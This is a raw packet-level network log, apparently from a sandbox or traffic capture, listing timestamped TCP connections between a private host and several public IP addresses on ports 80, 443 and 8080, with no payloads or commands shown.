Dec 1, 2024 22:51:47.532113075 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.539987087 CET	80	49726	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.541771889 CET	49726	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.551726103 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:47.553792953 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:47.554842949 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:47.558087111 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.558176994 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.558300972 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.558911085 CET	80	49728	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.558948040 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.558967113 CET	49728	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.573831081 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.577008009 CET	80	49729	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.577119112 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.577655077 CET	49729	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.578602076 CET	49729	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.670866013 CET	49730	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.674750090 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:47.698564053 CET	80	49729	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.791003942 CET	80	49730	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.793792963 CET	49730	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.796330929 CET	49730	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.916240931 CET	80	49730	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.917473078 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:48.037483931 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:48.694442034 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:48.694475889 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:48.694539070 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:48.700423002 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:48.701237917 CET	49729	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.701335907 CET	49730	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.703715086 CET	49731	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.820344925 CET	80	49727	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:48.821568966 CET	80	49729	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.821672916 CET	49729	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.823610067 CET	80	49731	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.823692083 CET	49731	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.831507921 CET	49731	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.852283001 CET	49732	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.852721930 CET	49733	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.864371061 CET	80	49730	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.907959938 CET	80	49730	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.908149958 CET	49730	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.972304106 CET	80	49732	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.972454071 CET	49732	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.972601891 CET	80	49733	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:48.972667933 CET	49733	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.972812891 CET	49733	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:48.972817898 CET	49732	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.092715025 CET	80	49733	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.092729092 CET	80	49732	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.177805901 CET	49734	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.177938938 CET	49732	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.178041935 CET	49733	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.178255081 CET	49735	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.298024893 CET	80	49734	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.298113108 CET	80	49735	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.298142910 CET	49734	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.298176050 CET	49735	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.298333883 CET	49734	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.298528910 CET	49735	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:49.321589947 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:49.341486931 CET	80	49733	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.341661930 CET	80	49732	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.418148041 CET	80	49734	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.418353081 CET	80	49735	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:49.442147970 CET	80	49736	208.95.112.1	192.168.2.16
Dec 1, 2024 22:51:49.442311049 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:49.442509890 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:49.562498093 CET	80	49736	208.95.112.1	192.168.2.16
Dec 1, 2024 22:51:50.049186945 CET	80	49733	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:50.049283028 CET	49733	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:50.085414886 CET	80	49732	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:50.085550070 CET	49732	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:50.687685966 CET	80	49736	208.95.112.1	192.168.2.16
Dec 1, 2024 22:51:50.688977957 CET	49735	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:50.688980103 CET	49734	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:50.740078926 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:50.809866905 CET	80	49735	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:50.809906960 CET	80	49734	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:50.809942007 CET	49735	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:50.809998989 CET	49734	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:51.094629049 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:51.095305920 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.214935064 CET	80	49736	208.95.112.1	192.168.2.16
Dec 1, 2024 22:51:51.215045929 CET	49736	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:51:51.215240002 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.215329885 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.215532064 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.335366964 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.570249081 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690289021 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690301895 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690406084 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690424919 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690435886 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690485954 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690511942 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690541983 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690565109 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690593004 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690669060 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690679073 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690730095 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690738916 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.690740108 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.690794945 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.810395002 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.810482979 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.810616016 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.810627937 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.810676098 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.810806990 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.810859919 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.810890913 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.810945988 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.853476048 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.853620052 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:51.973586082 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:51.973752022 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:52.021523952 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:52.021667957 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:52.327927113 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:52.328093052 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:52.449197054 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:52.573396921 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:52.573534012 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:52.821394920 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:51:52.821474075 CET	49737	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:51:53.069395065 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:02.564193964 CET	49739	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.564198971 CET	49740	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.564291000 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:02.564338923 CET	443	49738	159.69.63.226	192.168.2.16
Dec 1, 2024 22:52:02.564419985 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:02.569602966 CET	49741	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.569675922 CET	49742	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.574508905 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:02.574533939 CET	443	49738	159.69.63.226	192.168.2.16
Dec 1, 2024 22:52:02.684384108 CET	80	49739	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:02.684396982 CET	80	49740	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:02.684521914 CET	49739	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.684528112 CET	49740	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.685345888 CET	49739	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.685348988 CET	49740	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.689572096 CET	80	49741	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:02.689603090 CET	80	49742	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:02.689673901 CET	49741	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.689678907 CET	49742	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.690598965 CET	49742	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.690638065 CET	49741	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.805932045 CET	80	49739	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:02.809370995 CET	80	49740	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:02.810554028 CET	80	49742	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:02.815890074 CET	80	49741	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:02.874918938 CET	49743	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:02.877015114 CET	49741	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.877417088 CET	49742	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.877439022 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:02.879722118 CET	49740	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.884143114 CET	49744	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.890805960 CET	49745	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.890818119 CET	49746	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:02.891603947 CET	49739	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.916444063 CET	49747	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:02.919347048 CET	443	49738	159.69.63.226	192.168.2.16
Dec 1, 2024 22:52:02.994960070 CET	80	49743	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:02.995090008 CET	49743	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:02.995702982 CET	49743	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.004017115 CET	80	49744	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.004123926 CET	49744	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.007199049 CET	49744	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.010756016 CET	80	49745	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.010763884 CET	80	49746	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.010838985 CET	49745	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.010874987 CET	49746	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.036437988 CET	80	49747	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.036556959 CET	49747	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.037462950 CET	49747	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.041412115 CET	80	49742	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.041429043 CET	80	49741	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.041440964 CET	80	49740	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.053450108 CET	80	49739	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.115612984 CET	80	49743	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:03.127219915 CET	80	49744	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.157449961 CET	80	49747	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.250344038 CET	49748	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.252145052 CET	49744	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.259706020 CET	49747	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.262485027 CET	49749	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:03.278840065 CET	49743	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.282541990 CET	49750	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.352370024 CET	49746	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.353363037 CET	49745	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.370244980 CET	80	49748	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.370393038 CET	49748	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.373039961 CET	49748	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.382364035 CET	80	49749	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:03.382469893 CET	49749	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:03.382965088 CET	49749	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:03.402466059 CET	80	49750	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.402573109 CET	49750	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.404030085 CET	49750	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.417459011 CET	80	49744	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.421561956 CET	80	49747	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.441420078 CET	80	49743	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:03.503000975 CET	80	49749	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:03.523940086 CET	80	49750	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.592818975 CET	80	49740	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.592885017 CET	49740	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.629328966 CET	80	49739	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.629383087 CET	49739	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.645183086 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.654885054 CET	49749	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:03.670490026 CET	49750	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.765136957 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:03.765245914 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.765655041 CET	80	49741	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.765718937 CET	49741	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.765852928 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.817455053 CET	80	49749	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:03.833422899 CET	80	49750	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.839246035 CET	80	49742	172.217.19.238	192.168.2.16
Dec 1, 2024 22:52:03.839296103 CET	49742	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:52:03.839550018 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.885915041 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:03.911125898 CET	80	49744	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.911194086 CET	49744	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:03.959414005 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:03.959522963 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.961611032 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:03.980319977 CET	80	49747	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:03.980382919 CET	49747	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:04.046746016 CET	443	49738	159.69.63.226	192.168.2.16
Dec 1, 2024 22:52:04.046840906 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:04.046865940 CET	49738	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:52:04.071507931 CET	80	49743	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:04.071608067 CET	49743	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:04.081537962 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:04.341165066 CET	80	49749	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:04.341273069 CET	49749	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:04.346769094 CET	80	49750	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:04.346909046 CET	49750	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:05.369508028 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.369558096 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.369631052 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.401010036 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.517887115 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.517906904 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.518007040 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.520936012 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.521019936 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.535717964 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.641046047 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.641165972 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.655708075 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.655818939 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.761365891 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.775939941 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:05.920072079 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:05.925657988 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.011497021 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.011523008 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.011564016 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.040071011 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.040157080 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.045582056 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.056135893 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.131706953 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.136085033 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.136132002 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.136152029 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.136204958 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.160065889 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.199054003 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.199074030 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.199146986 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.306850910 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.306924105 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.306988001 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.324038029 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.324151993 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.324208975 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.400722027 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.400784016 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.400835991 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.424324989 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.424532890 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.424595118 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.501713037 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.501779079 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.501848936 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.525043964 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.525140047 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.525217056 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.602384090 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.602410078 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.602493048 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.625586033 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.625592947 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.625677109 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.703200102 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.703232050 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.703315973 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.726164103 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.726267099 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.726325989 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.803287983 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.803325891 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.803386927 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.826710939 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.826734066 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.826823950 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.904077053 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.904226065 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.904293060 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:06.927237988 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.927292109 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:06.927371979 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.005052090 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.005088091 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.005203009 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.027673006 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.027853966 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.027916908 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.106242895 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.106313944 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.106374025 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.114408970 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.128211021 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.128269911 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.128329992 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.228662014 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.228677034 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.228756905 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.234369040 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.234458923 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.243685961 CET	49752	80	192.168.2.16	172.217.19.164
